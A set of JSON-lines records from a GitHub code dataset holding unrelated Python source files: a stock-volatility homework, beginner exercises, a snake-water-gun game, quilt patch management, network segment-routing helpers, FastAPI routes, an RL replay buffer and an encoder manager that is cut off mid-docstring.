ТИКЕР6 - ХХХ.ХХ %\n# Нулевая волатильность:\n# ТИКЕР7, ТИКЕР8, ТИКЕР9, ТИКЕР10, ТИКЕР11, ТИКЕР12\n# Волатильности указывать в порядке убывания. Тикеры с нулевой волатильностью упорядочить по имени.\n#\nimport multiprocessing\n\nfrom path_sort_data import get_path, sort, output_data\n\n\nclass SecuritiesVolatility(multiprocessing.Process):\n\n def __init__(self, file_name, collector, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.file_name = file_name\n self.collector = collector\n self.securities = {}\n\n def volatility_calculation(self):\n with open(self.file_name, 'r', encoding='utf8') as file:\n prices = []\n for line in file:\n if line != 'SECID,TRADETIME,PRICE,QUANTITY\\n':\n elems = line.split(',')\n price = float(elems[2])\n security_paper = elems[0]\n prices.append(price)\n min_price = min(prices)\n max_price = max(prices)\n average_price = (max_price + min_price) / 2\n volatility = round(((max_price - min_price) / average_price) * 100, 2)\n self.securities[security_paper] = volatility\n self.collector.put(self.securities)\n\n def run(self):\n self.volatility_calculation()\n\n\nif __name__ == '__main__':\n\n securities_volatility = {}\n\n wanted_folder = 'trades'\n path = get_path(wanted_folder)\n\n collector = multiprocessing.Queue()\n data_securities = [SecuritiesVolatility(file_name=file, collector=collector) for file in path]\n\n for process in data_securities:\n process.start()\n\n for process in data_securities:\n process.join()\n\n while not collector.empty():\n data = collector.get()\n securities_volatility.update(data)\n\n data = sort(securities_volatility)\n securities_volatility = data[0]\n zero_volatility = data[1]\n output_data(securities_volatility, zero_volatility)\n# зачет!\n","repo_name":"tidml/python_base","sub_path":"lesson_012/03_volatility_with_processes.py","file_name":"03_volatility_with_processes.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18151778464","text":"#Problem 2\r\n#Kullanıcıdan 3 tane sayı alın ve en büyük sayıyı ekrana yazdırın.\r\n\r\ns1=int(input(\"1.Sayı: \"))\r\ns2=int(input(\"2.Sayı: \"))\r\ns3=int(input(\"3.Sayı: \"))\r\n\r\nif(s1>s2 and s1>s3):\r\n print(\"Sayu 1 En Büyük.\")\r\nelif(s2>s3 and s2>s1):\r\n print(\"Sayı 2 En Büyük.\")\r\nelif(s3>s2 and s3>s1):\r\n print(\"Sayu 3 En büyük.\") ","repo_name":"4Noyis/Python","sub_path":"Python/Part_2/Problem_2.py","file_name":"Problem_2.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71302620167","text":"from quilt.command import Command\nfrom quilt.db import Db, Series\nfrom quilt.error import NoPatchesInSeries, NoAppliedPatch, UnknownPatch, \\\n QuiltError\nfrom quilt.patch import Patch\nfrom quilt.pop import Pop\nfrom quilt.signals import Signal\nfrom quilt.utils import Directory, File\n\n\nclass Delete(Command):\n\n \"\"\"Command class to delete patches\n \"\"\"\n\n deleting_patch = Signal()\n deleted_patch = Signal()\n\n def __init__(self, cwd, quilt_pc, quilt_patches):\n super(Delete, self).__init__(cwd)\n self.quilt_pc = Directory(quilt_pc)\n self.quilt_patches = Directory(quilt_patches)\n self.db = Db(quilt_pc)\n self.series = Series(quilt_patches)\n self.pop = Pop(cwd, quilt_pc)\n\n def _delete_patch(self, patch, remove=False, backup=False):\n if self.series.is_empty():\n raise NoPatchesInSeries(self.series)\n if not self.series.is_patch(patch):\n raise UnknownPatch(self.series, patch)\n\n applied = self.db.top_patch() == patch\n self.deleting_patch(patch, applied)\n\n if applied:\n self.pop._unapply_patch(patch)\n self.db = self.pop.db\n self.db.save()\n\n self.series.remove_patch(patch)\n self.series.save()\n\n patch_file = self.quilt_patches + File(patch.get_name())\n\n if remove:\n if backup:\n patch_file.copy(File(patch_file.get_name() + \"~\"))\n\n patch_file.delete_if_exists()\n\n self.deleted_patch(patch)\n\n def delete_next(self, remove=False, backup=False):\n \"\"\" Delete next unapplied patch\n If remove is True the patch file will also be removed. If remove and\n backup are True a copy of the deleted patch file will be made.\n \"\"\"\n patch = self.db.top_patch()\n if patch:\n after = self.series.patch_after(patch)\n else:\n after = self.series.first_patch()\n if not after:\n raise QuiltError(\"No next patch\")\n\n self._delete_patch(after, remove=remove, backup=backup)\n\n def delete_patch(self, patch_name=None, remove=False, backup=False):\n \"\"\" Delete specified patch from the series\n If remove is True the patch file will also be removed. If remove and\n backup are True a copy of the deleted patch file will be made.\n \"\"\"\n if patch_name:\n patch = Patch(patch_name)\n else:\n patch = self.db.top_patch()\n if not patch:\n raise NoAppliedPatch(self.db)\n\n self._delete_patch(patch, remove=remove, backup=backup)\n","repo_name":"bjoernricks/python-quilt","sub_path":"quilt/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"25174028942","text":"import csv\nimport sys\nimport pydot\nimport numpy as np\nfrom sklearn import tree\nfrom sklearn import preprocessing\nfrom sklearn.externals.six import StringIO\nclass_names=['low','medium','high']\n#Args checking\nif(len(sys.argv) is not 3):\n\tprint(\"Usage: python3 E13.py <input_training_file> <output_pdf_file>\")\n\texit()\n#Files open\ntraining=list(csv.reader(open(sys.argv[1])))\nfeature_names=training[0][1:-1]\ntraining=training[1:]\n#Training data separation\ntarget=list(map(lambda x : x[-1],training))\nle = preprocessing.LabelEncoder()\nle.fit(class_names)\n\nclass_names=le.inverse_transform(np.sort(le.transform(class_names)))\n\ntarget=le.transform(target)\n\ndata=np.array(list(map(lambda x : x[1:-1],training)))\n\n#Decision Tree Training\ntreeClas=tree.DecisionTreeClassifier()\ntreeClas.fit(data, target)\n\n#Decision Tree Plot\ndot_data = StringIO()\n\ntree.export_graphviz(treeClas, out_file=dot_data,feature_names=feature_names,class_names=class_names,filled=True, rounded=True, special_characters=True)\n\ngraph = pydot.graph_from_dot_data(dot_data.getvalue())\ngraph.write_pdf(path=sys.argv[2])\n","repo_name":"Xiul109/MachineLearningTec","sub_path":"E13.py","file_name":"E13.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16168737272","text":"'''SNAKE WATER GUN GAME'''\r\n'''IN THIS STEP WE ARE IMPORTING AN INBUILT MODULE RANDOM WHICH WILL HELP US IN RANDOMIZING THE COMPUTERS OUTPUT'''\r\nimport random\r\n'''THIS IS A MODULE FOR MAKING GUI'''\r\nimport easygui\r\ndef game(user,comp):#HERE WE ARE DEFINING A FUNCTION THAT WILL HELP US IN COMPARING THE OUTPUT OF THE USER AND THE COMPUTER AND DECIDE THE WINNER\r\n if user==comp:\r\n return None\r\n elif comp=='s':\r\n if user=='w':\r\n return False\r\n elif user=='g':\r\n return True \r\n elif comp=='w':\r\n if user=='s':\r\n return True\r\n elif user=='g':\r\n return False\r\n elif comp=='g':\r\n if user=='s':\r\n return False\r\n elif user=='w':\r\n return True #THIS PART IS THE LOGICAL PART\r\n'''NOW WE NEED TO THINK ABOUT THE COMPUTER OUTPUT '''\r\ncomp=(\"Computer's turn : Snake(s) Water(w) Gun(g)\")\r\nrandno=random.randint(1,3) #SO AFTER CALLING THE RANDOM FUNCTION WE ARE GRNERATING RANDOM NUMBERS BETWEEEN 1 AND 3 \r\nif randno==1:\r\n comp='s'\r\nelif randno==2:\r\n comp='w'\r\nelse:\r\n comp='g' #ASSIGNED THOSE VALUES TO THE COMPUTERS OUTPUT\r\n# '''TAKING INPUT FROM THE USER''' \r\nprint(\"WELCOME TO THE GAME OF SNAKE WATER AND GUN SNAKE YOU ARE AGAINST COMPUTER \\n MAY THE BETTER PLAYER WIN \") \r\nuser=input(\"User's turn: Snake(s) Water(w) Gun(g): \")\r\nprint(f\"Computer chose {comp}\")\r\nprint(f\"user chose {user}\")\r\nf=game(user,comp)\r\nif f==None:\r\n easygui.ynbox('ITS A DRAW !')\r\nelif f:\r\n easygui.ynbox('YOU WIN COMPUTER NOOBDA')\r\nelse:\r\n easygui.ynbox('YOU LOOSE KOI NA')\r\n\r\n","repo_name":"mayankfulara/Snake-Water-Gun-Game","sub_path":"SnakeWate.py","file_name":"SnakeWate.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42327018291","text":"\"\"\" Common get functions for segment-routing \"\"\"\r\n\r\n# Python\r\nimport re\r\nimport logging\r\n\r\n# pyATS\r\nfrom pyats.utils.objects import find, R\r\n\r\n# Genie\r\nfrom genie.libs.sdk.libs.utils.normalize import GroupKeys\r\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\r\n\r\n# Running-Config\r\nfrom genie.libs.sdk.apis.iosxe.running_config.get import (\r\n get_running_config_section_dict,\r\n)\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\ndef get_segment_routing_policy_active_path_hop_labels(device, policy,\r\n policy_dict=None, ignore_first_label=False):\r\n \"\"\" Find a segement-routing policy in expected state\r\n\r\n Args:\r\n device ('obj'): Device object\r\n policy ('str'): Policy name\r\n policy_dict ('dict'): Policy dict from parser output\r\n IOSXE Parser - ShowSegmentRoutingTrafficEngPolicy\r\n cmd - show segment-routing traffic-eng policy all\r\n ignore_first_label (`bool`): flag to ignore first label\r\n Returns:\r\n labels ('list'): Hop labels\r\n \"\"\"\r\n labels = []\r\n cmd = 'show segment-routing traffic-eng policy name {policy}'.format(policy=policy)\r\n if policy_dict is None:\r\n try:\r\n out = device.parse(cmd)\r\n except Exception as e:\r\n log.error(\"Failed to parse '{cmd}': {e}\".format(cmd=cmd, e=e))\r\n return labels\r\n else:\r\n out = policy_dict\r\n\r\n # Check explicit path\r\n reqs = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference','(?P<preference>.*)',\r\n 'path_type','explicit',\r\n '(?P<category>.*)','(?P<name>.*)',\r\n 'status','(?P<status>.*)'])\r\n explicit = find([out], reqs, filter_=False, all_keys=True)\r\n if explicit:\r\n keys = GroupKeys.group_keys(reqs=reqs.args, ret_num={},\r\n source=explicit, all_keys=True)\r\n \r\n for item in keys:\r\n if item['status'] == 'active':\r\n path_index = item['preference']\r\n\r\n reqs2 = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference',path_index,\r\n 'path_type','explicit',\r\n '(?P<category>.*)','(?P<name>.*)',\r\n 'hops','(?P<hops>.*)'])\r\n hops = find([out], reqs2, filter_=False, all_keys=True)\r\n if hops:\r\n hop = hops[0][0]\r\n for value in hop.values():\r\n sid = value.get('sid', '')\r\n labels.append(str(sid))\r\n\r\n if ignore_first_label and len(labels):\r\n labels.pop(0)\r\n return labels\r\n\r\n # Check dynamic path if no active path in explicit path\r\n reqs = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference','(?P<preference>.*)',\r\n 'path_type','dynamic',\r\n 'status','(?P<status>.*)'])\r\n dynamic = find([out], reqs, filter_=False, all_keys=True)\r\n if dynamic:\r\n keys = GroupKeys.group_keys(reqs=reqs.args, ret_num={},\r\n source=dynamic, all_keys=True)\r\n\r\n for item in keys:\r\n if item['status'] == 'active':\r\n path_index = item['preference']\r\n\r\n reqs2 = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference',path_index,\r\n 'path_type','dynamic',\r\n 'hops','(?P<hops>.*)'])\r\n hops = find([out], reqs2, filter_=False, all_keys=True)\r\n if hops:\r\n hop = hops[0][0]\r\n for value in hop.values():\r\n sid = value.get('sid', '')\r\n labels.append(str(sid))\r\n\r\n if ignore_first_label and len(labels):\r\n labels.pop(0)\r\n return labels\r\n\r\n\r\ndef get_segment_routing_policy_in_state(device, expected_admin='up', expected_oper='up',\\\r\n expected_color='', expected_endpoint=''):\r\n \"\"\" Find a segement-routing policy in expected state\r\n\r\n Args:\r\n device ('obj'): Device object\r\n expected_admin ('str'): Expected admin state\r\n expected_oper ('str'): Expected operational state\r\n expected_color (`str`): Expected color\r\n expected_endpoint (`str`): Expected end-point address\r\n Returns:\r\n policy ('str'): Policy name\r\n \"\"\"\r\n cmd = 'show segment-routing traffic-eng policy all'\r\n try:\r\n out = device.parse(cmd)\r\n except Exception as e:\r\n log.error(\"Failed to parse '{cmd}': {e}\".format(cmd=cmd, e=e))\r\n return None\r\n\r\n for policy in out.keys():\r\n admin = out.get(policy, {}).get('status', {}).get('admin', '')\r\n oper = out.get(policy, {}).get('status', {}).\\\r\n get('operational', {}).get('state', '')\r\n color = str(out.get(policy, {}).get('color', ''))\r\n endpoint = out.get(policy, {}).get('end_point', '')\r\n\r\n if (admin.lower() == expected_admin.lower() and \r\n oper.lower() == expected_oper.lower() and \r\n color == expected_color and \r\n endpoint == expected_endpoint):\r\n return policy\r\n else:\r\n log.info(\"Failed to find a policy with admin state {admin} \"\r\n \"and oper state {oper}\".format(admin=expected_admin,\r\n oper=expected_oper))\r\n return None\r\n\r\n\r\ndef get_segment_routing_sid_map_configuration(device, address_family=\"ipv4\"):\r\n \"\"\" Get Segment routing SID map configuration\r\n\r\n Args:\r\n device ('str'): Device str\r\n address_family ('str'): Address family\r\n Returns:\r\n Dictionary with ip address as key and sid as value\r\n ex.)\r\n {\r\n '192.168.1.1': '1',\r\n '192.168.1.2': '2'\r\n }\r\n \"\"\"\r\n out = get_running_config_section_dict(\r\n device=device, section=\"segment-routing\"\r\n )\r\n\r\n sid_dict = {}\r\n\r\n if not out:\r\n return None\r\n\r\n p1 = re.compile(r\"^(?P<ip_address>\\S+) index (?P<sid>\\d+) range \\d+$\")\r\n\r\n connected_prefix_sid_maps = out[\"segment-routing mpls\"][\r\n \"connected-prefix-sid-map\"\r\n ][\"address-family {}\".format(address_family)].keys()\r\n\r\n for key in connected_prefix_sid_maps:\r\n key = key.strip()\r\n m = p1.match(key)\r\n if m:\r\n group = m.groupdict()\r\n sid_dict.update({group[\"ip_address\"]: group[\"sid\"]})\r\n continue\r\n\r\n return sid_dict\r\n\r\n\r\ndef get_segment_routing_lb_range(device):\r\n \"\"\" Gets segement-routing local block range\r\n\r\n Args:\r\n device ('obj'): device to use\r\n\r\n Returns:\r\n ('int', 'int'): label_min, label_max\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n try:\r\n out = device.parse(\"show segment-routing mpls lb\")\r\n except SchemaEmptyParserError:\r\n return None, None\r\n\r\n return out.get(\"label_min\"), out.get(\"label_max\")\r\n\r\n\r\ndef get_segment_routing_gb_range(device):\r\n \"\"\" Gets segement-routing global block range\r\n\r\n Args:\r\n device ('obj'): device to use\r\n\r\n Returns:\r\n ('int', 'int'): label_min, label_max\r\n\r\n Raises:\r\n None\r\n \"\"\"\r\n try:\r\n out = device.parse(\"show segment-routing mpls gb\")\r\n except SchemaEmptyParserError:\r\n return None, None\r\n\r\n return out.get(\"label_min\"), out.get(\"label_max\")\r\n\r\ndef get_segment_routing_accumulated_path_metric(device, preference, policy_name=None):\r\n \"\"\" Get accumulated path metric for a preference path\r\n\r\n Args:\r\n device ('obj'): Device to use\r\n policy_name ('str'): Policy name to verify. If not specified will verify all\r\n preference ('int'): Preference path\r\n\r\n Returns:\r\n accumulated_metric (None, 'int'): Accumulated path metric\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n if policy_name:\r\n cmd = 'show segment-routing traffic-eng policy name {policy}'.format(policy=policy_name)\r\n else:\r\n cmd = 'show segment-routing traffic-eng policy all'\r\n \r\n try:\r\n out = device.parse(cmd)\r\n except SchemaEmptyParserError:\r\n return None\r\n \r\n for policy in out:\r\n for preference_found in out[policy].get('candidate_paths', {}).get('preference', {}):\r\n if preference != preference_found:\r\n continue\r\n if out[policy]['candidate_paths']['preference'][preference].get('path_type'):\r\n path_type_dict = out[policy]['candidate_paths']['preference'][preference]['path_type']\r\n if 'dynamic' in path_type_dict:\r\n accumulated_metric = path_type_dict['dynamic'].get('path_accumulated_metric', '')\r\n return accumulated_metric\r\n return None\r\n\r\ndef get_segment_routing_labels_from_bgp(device, route, vrf, best_path=False):\r\n \"\"\" Gets segement-routing labels from bgp table\r\n\r\n Args:\r\n device (`obj`): device to use\r\n route (`str`): route to check\r\n vrf (`vrf`): VRF name\r\n best_path (`bool`): only best path returned\r\n\r\n Returns:\r\n ('list'): list of segment routing labels\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n\r\n # search destination's endpoint and color by \r\n # show ip bgp vpnv4 vrf <vrf> <destination address>\r\n\r\n endpoint_color_list = device.api.get_ip_bgp_route_nexthop_color(\r\n address_family='vpnv4', route=route, vrf=vrf, best_path=True)\r\n \r\n # get policy names based on endpoint and color\r\n policy_list = []\r\n label_list = []\r\n if endpoint_color_list:\r\n log.info('Found endpoint and color: {}'.format(\r\n endpoint_color_list))\r\n for endpoint, color in endpoint_color_list:\r\n policy = device.api.get_segment_routing_policy_in_state(\r\n expected_admin='up', expected_oper='up',\r\n expected_color=color, expected_endpoint=endpoint)\r\n # don't have redundant policy\r\n if policy not in policy_list:\r\n policy_list.append(policy)\r\n if policy_list:\r\n log.info('Policy Found: {}'.format(policy_list))\r\n for policy in policy_list:\r\n label_list = device.api.\\\r\n get_segment_routing_policy_active_path_hop_labels(\r\n policy=policy, ignore_first_label=True)\r\n\r\n return label_list\r\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/segment_routing/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":10585,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"} +{"seq_id":"14500229895","text":"\"\"\"\nItem routes\n\"\"\"\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom sqlalchemy.orm import Session\n\nfrom app.schemas.item import ItemSchema, ItemCreateSchema, ItemUpdateSchema\nfrom app.api.v1.dependencies import get_db\nfrom app.crud import item as crud\n\n\nrouter = APIRouter()\n\n\n@router.get('/', response_model=list[ItemSchema])\ndef read_all(db: Session = Depends(get_db)):\n \"\"\"Read items\"\"\"\n return crud.get_items(db)\n\n\n@router.get('/{item_id}', response_model=ItemSchema)\ndef read_one(item_id: int, db: Session = Depends(get_db)):\n \"\"\"Get item by id\"\"\"\n item = crud.get_item_by_id(item_id=item_id, db=db)\n if item is None:\n raise HTTPException(status_code=404)\n else:\n return item\n\n\n@router.put('/{item_id}', response_model=ItemSchema)\ndef update(item_id: int, item: ItemUpdateSchema, db: Session = Depends(get_db)):\n \"\"\"Update item\"\"\"\n item = crud.update_item(db, item_id, item)\n if item is None:\n raise HTTPException(status_code=404)\n else:\n return item\n\n\n@router.post('/', response_model=ItemSchema)\ndef create(item: ItemCreateSchema, db: Session = Depends(get_db)):\n \"\"\"Create new item\"\"\"\n return crud.create_item(db, item)\n\n\n@router.delete('/{item_id}')\ndef delete(item_id: int, db: Session = Depends(get_db)):\n \"\"\"Delete item\"\"\"\n response = crud.disable_item(db, item_id)\n if response is None:\n raise HTTPException(status_code=404)\n","repo_name":"beerman17/dragonroll-gameserver","sub_path":"app/api/v1/endpoints/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6067989024","text":"import json\nimport logging\nimport os\nimport numpy as np\n\nfrom gym.utils import atomic_write\nfrom rltf.utils import rltf_conf\nfrom rltf.utils import seeding\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseBuffer():\n \"\"\"Abstract buffer that saves agent experience. Supports both image and low-dimensional observations.\n Very memory efficient implementation in the case of images.\"\"\"\n\n def __init__(self, size, state_shape, obs_dtype, act_shape, act_dtype, obs_len):\n \"\"\"\n Args:\n state_shape: tuple or list. Shape of what is consedered to be a single state (not observation).\n For example, for DQN this should be `[84, 84, 4]` because a state is comprised of the last 4\n frames (observations).\n obs_dtype: np.dtype. Type of the observation data\n act_shape: tuple or list. Shape of the action space\n act_dtype: np.dtype. Type of the action data\n obs_len: int, `>= 1`. The number of observations that comprise a state. If `obs_len=1`,\n then `obs_shape == state_shape`. Must equal 1 for low-dimensional observations.\n If `obs_len>=1`, then observations must be images. In this case, states are comprised of\n stacked consecutive observations (images) and `obs_shape[-1] == state_shape[-1] / obs_len`.\n In this case the buffer stores observations separately and automatically reconstructs the\n full states when queried. Corresponds to the order of the MDP.\n \"\"\"\n\n # Compute the observation shape\n obs_shape = self._get_obs_shape(state_shape, obs_len, obs_dtype)\n\n self.obs_shape = list(obs_shape) # observation shape (NOT state shape!)\n self.act_shape = list(act_shape)\n self.obs_len = obs_len\n\n self.max_size = int(size)\n self.size_now = 0\n self.next_idx = 0\n # self.new_idx = 0\n\n # Create the buffers\n self.obs = np.empty([self.max_size] + self.obs_shape, dtype=obs_dtype)\n self.action = np.empty([self.max_size] + self.act_shape, dtype=act_dtype)\n self.reward = np.empty([self.max_size], dtype=np.float32)\n self.done = np.empty([self.max_size], dtype=np.bool)\n\n self.prng = seeding.get_prng()\n\n\n @staticmethod\n def _get_obs_shape(state_shape, obs_len, obs_dtype):\n \"\"\"Compute the shape of a single observation (not state)\"\"\"\n\n assert isinstance(obs_len, int) and obs_len >= 1\n\n # Only image observations support stacking observations\n if obs_len > 1:\n assert len(state_shape) == 3\n # Make sure that the type of the observation is np.uint8 for images\n if len(state_shape) == 3:\n assert obs_dtype == np.uint8\n\n # Images assume that the last dimension of the shape is the channel dimension\n if obs_len > 1 and len(state_shape) == 3:\n assert state_shape[-1] % obs_len == 0\n obs_shape = list(state_shape)\n obs_shape[-1] = int(obs_shape[-1]/obs_len)\n else:\n obs_shape = state_shape\n\n return obs_shape\n\n\n def store(self, obs_t, act_t, rew_tp1, done_tp1):\n \"\"\"Store an observed transition. If `obs_len>1`, the next call to this function must be with\n the observation after taking `act_t`, otherwise, reconstructed state will be incorrect.\n If `done_tp1 == True`, then `store()` should not be called with `obs_tp1`, since the agent\n does not need it for computing the return\n Args:\n obs_t: `np.array`, of shape `state_shape`. If `obs_len>1`, the observation is automatically\n extracted and stored instead of storing duplicate data.\n act_t: `np.array`, of shape `act_shape` or `float`. Action taken when `obs_t` was observed\n reward_tp1: `float`. Reward obtained on executing `act_t` in state `obs_t`\n done_tp1: `bool`. True if episode terminated on executing `act_t` in state `obs_t`.\n \"\"\"\n\n # To avoid storing the same data several times, if obs_len > 1, then store only the last\n # observation from the stack of observations that comprise a state\n if self.obs_len > 1:\n self.obs[self.next_idx] = obs_t[:, :, -self.obs_shape[-1]:]\n else:\n self.obs[self.next_idx] = obs_t\n\n self.action[self.next_idx] = act_t\n self.reward[self.next_idx] = rew_tp1\n self.done[self.next_idx] = done_tp1\n\n self.next_idx = (self.next_idx + 1) % self.max_size\n self.size_now = min(self.max_size, self.size_now + 1)\n\n\n def _encode_img_observation(self, idx):\n \"\"\"Encode the observation for idx by stacking the `obs_len` preceding frames together.\n Assume there are more than `obs_len` frames in the buffer.\n NOTE: Used only for image observations\n \"\"\"\n hi = idx + 1 # make noninclusive\n lo = hi - self.obs_len\n\n for i in range(lo, hi - 1):\n if self.done[i % self.max_size]:\n lo = i + 1\n missing = self.obs_len - (hi - lo)\n\n # We need to duplicate the lo observation\n if missing > 0:\n frames = [self.obs[lo % self.max_size] for _ in range(missing)]\n for i in range(lo, hi):\n frames.append(self.obs[i % self.max_size])\n return np.concatenate(frames, 2)\n # We are on the boundary of the buffer\n elif lo < 0:\n img_h, img_w = self.obs.shape[1], self.obs.shape[2]\n frames = [self.obs[lo:], self.obs[:hi]]\n frames = np.concatenate(frames, 0)\n return frames.transpose(1, 2, 0, 3).reshape(img_h, img_w, -1)\n # The standard case\n else:\n # This optimization can save about 30% compute time\n img_h, img_w = self.obs.shape[1], self.obs.shape[2]\n return self.obs[lo:hi].transpose(1, 2, 0, 3).reshape(img_h, img_w, -1)\n\n\n def sample(self, batch_size):\n raise NotImplementedError()\n\n\n def new_data(self, batch_size=32):\n \"\"\"Yields the new data which was stored since the last call to this function.\n Args:\n batch_size: int. Size of a single yielded batch. Can be smaller than specified if not enough data\n Returns:\n python generator; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def all_data(self, batch_size=32):\n \"\"\"Yields all data in the buffer\n Args:\n batch_size: int. Size of a single yielded batch. Can be smaller than specified if not enough data\n Returns:\n python generator which should be iterated; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def recent_data(self, size, batch_size=32):\n \"\"\"Yields the most recent `size` number of examples in the buffer\n Args:\n size: int. Total number of data points to generate\n batch_size: int. Size of a single yielded batch. Can be smaller than specified if not enough data\n Returns:\n python generator which should be iterated; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def save(self, model_dir):\n \"\"\"Store the data to disk\n Args:\n model_dir: Full path of the directory to save the buffer\n \"\"\"\n save_dir = os.path.join(model_dir, \"buffer\")\n state_file = os.path.join(save_dir, \"state.json\")\n\n if not os.path.exists(save_dir):\n # Create symlink to store buffer if $RLTFBUF is defined\n if 'RLTFBUF' in os.environ:\n # split = os.path.split(os.path.normpath(model_dir))\n # envdir = split[1]\n # model = os.path.split(split[0])\n # store_dir = os.path.join(os.environ['RLTFBUF'], os.path.join(model, envdir))\n mdir = os.path.relpath(model_dir, rltf_conf.MODELS_DIR)\n store_dir = os.path.join(os.environ['RLTFBUF'], mdir)\n\n store_dir = os.path.join(store_dir, \"buffer\")\n if not os.path.exists(store_dir):\n os.makedirs(store_dir)\n os.symlink(store_dir, save_dir)\n # Store the buffer directly in the folder\n else:\n os.makedirs(save_dir)\n\n np.save(os.path.join(save_dir, \"obs.npy\"), self.obs[:self.size_now])\n np.save(os.path.join(save_dir, \"act.npy\"), self.action[:self.size_now])\n np.save(os.path.join(save_dir, \"rew.npy\"), self.reward[:self.size_now])\n np.save(os.path.join(save_dir, \"done.npy\"), self.done[:self.size_now])\n\n data = {\n \"size_now\": self.size_now,\n \"next_idx\": self.next_idx,\n # \"new_idx\": self.new_idx,\n }\n\n with atomic_write.atomic_write(state_file) as f:\n json.dump(data, f, indent=4, sort_keys=True)\n\n\n def restore(self, model_dir):\n \"\"\"Populate the buffer from data previously saved to disk\n Args:\n model_dir: Full path of the directory of the data\n \"\"\"\n save_dir = os.path.join(model_dir, \"buffer\")\n state_file = os.path.join(save_dir, \"state.json\")\n\n if not os.path.exists(save_dir):\n return logger.warning(\"BaseBuffer not saved and cannot resume. Continuing with empty buffer.\")\n\n with open(state_file, 'r') as f:\n data = json.load(f)\n\n self.size_now = data[\"size_now\"]\n self.next_idx = data[\"next_idx\"]\n # self.new_idx = data[\"new_idx\"]\n\n obs = np.load(os.path.join(save_dir, \"obs.npy\"))\n action = np.load(os.path.join(save_dir, \"act.npy\"))\n done = np.load(os.path.join(save_dir, \"done.npy\"))\n reward = np.load(os.path.join(save_dir, \"rew.npy\"))\n\n assert len(obs) == len(action) == len(reward) == len(done) == self.size_now\n assert self.obs.shape[1:] == obs.shape[1:]\n assert self.action.shape[1:] == action.shape[1:]\n assert self.reward.shape[1:] == reward.shape[1:]\n assert self.done.shape[1:] == done.shape[1:]\n\n self.obs[:self.size_now] = obs\n self.action[:self.size_now] = action\n self.reward[:self.size_now] = reward\n self.done[:self.size_now] = done\n\n\n def _sample_n_unique(self, n, lo, hi, exclude=None):\n \"\"\"Sample n unique indices in the range [lo, hi), making sure no sample appreas in `exclude`\n Args:\n n: int. Number of samples to take\n lo: int. Lower boundary of the sample range; inclusive\n hi: int. Upper boundary of the sample range; exclusive\n exclude: list or np.array. Contains values that samples must not take\n Returns:\n np.array of the sampled indices\n \"\"\"\n\n batch = np.empty(n, dtype=np.uint32)\n k = 0\n\n while k < n:\n samples = self.prng.randint(lo, hi, n-k)\n # Get only the unique entries\n samples = np.unique(samples)\n # Get only the entries which are not in exclude\n if exclude is not None:\n valid = np.all(samples[:, None] != exclude, axis=-1)\n samples = samples[valid]\n # Update batch\n end = min(k + samples.shape[0], n)\n batch[k:end] = samples\n k = end\n\n return batch\n\n\n def reset(self):\n self.size_now = 0\n self.next_idx = 0\n # self.new_idx = 0\n\n\n @property\n def size(self):\n return self.max_size\n\n\n def __len__(self):\n return self.size_now\n","repo_name":"nikonikolov/rltf","sub_path":"rltf/memory/base_buffer.py","file_name":"base_buffer.py","file_ext":"py","file_size_in_byte":10664,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"16"} +{"seq_id":"7421855452","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n\nimport s2v_encoder\n\nFLAGS = tf.flags.FLAGS\n\n\nclass EncoderManager(object):\n \"\"\"Manager class for loading and encoding with skip-thoughts models.\"\"\"\n\n def __init__(self):\n self.encoders = []\n self.sessions = []\n\n def load_model(self, model_config):\n \"\"\"Loads a skip-thoughts model.\n\n Args:\n model_config: Object containing parameters for building the model.\n vocabulary_file: Path to vocabulary file containing a list of newline-\n separated words where the word id is the corresponding 0-based index in\n the file.\n embedding_matrix_file: Path to a serialized numpy array of shape\n [vocab_size, embedding_dim].\n checkpoint_path: SkipThoughtsModel checkpoint file or a directory\n containing a checkpoint file.\n \"\"\"\n\n g = tf.Graph()\n with g.as_default():\n encoder = s2v_encoder.s2v_encoder(model_config)\n restore_model = encoder.build_graph_from_config(model_config)\n\n sess = tf.Session(graph=g)\n\n restore_model(sess)\n\n self.encoders.append(encoder)\n self.sessions.append(sess)\n\n def encode(self,\n data,\n use_norm=True,\n verbose=False,\n batch_size=128,\n use_eos=False):\n \"\"\"Encodes a sequence of sentences as skip-thought vectors.\n\n Args:\n data: A list of input strings.\n use_norm: If True, normalize output skip-thought vectors to unit L2 norm.\n verbose: Whether to log every batch.\n 